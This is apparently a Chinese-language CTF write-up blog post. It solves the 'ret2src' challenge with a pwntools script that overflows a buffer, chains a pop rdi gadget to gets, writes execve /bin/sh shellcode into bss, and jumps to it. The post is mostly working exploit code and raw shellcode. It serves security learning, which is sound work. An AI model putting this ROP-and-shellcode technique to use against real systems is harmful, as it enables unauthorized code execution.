Pwnctf ret2src Writeup

kazma 成大資安社 創辦人/社長
  2024-01-09 18:30:32 2024-01-09 18:30:32 Created   2024-01-09 19:23:32 2024-01-09 19:23:32 Updated    

ret2src

先看一下保護機制:

checksec

這題什麼保護機制都沒有w,所以作法應該蠻多種的,這裡 return 到 gets 的 plt,把 shellcode 寫到某個 bss 段,然後再跳上開 shell。

exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
context.arch = 'amd64'

r = process('./ret2src')
#pause()

pop_rdi = 0x0000000000400713
bss = 0x602000 - 0x100
gets = 0x00400510

p = flat(
    b'a'*0x18,
    pop_rdi,
    bss,
    gets,
    bss
)
r.sendlineafter(b':', p)
r.sendline(b'\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05')

r.interactive()

shellcode :
https://www.exploit-db.com/shellcodes/49770

Pwned !!!

  • Title: Pwnctf ret2src Writeup
  • Author: kazma
  • Created at : 2024-01-09 18:30:32
  • Updated at : 2024-01-09 19:23:32
  • Link: https://kazma.tw/2024/01/09/Pwnctf-ret2src-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwnctf ret2src Writeup
  1. ret2src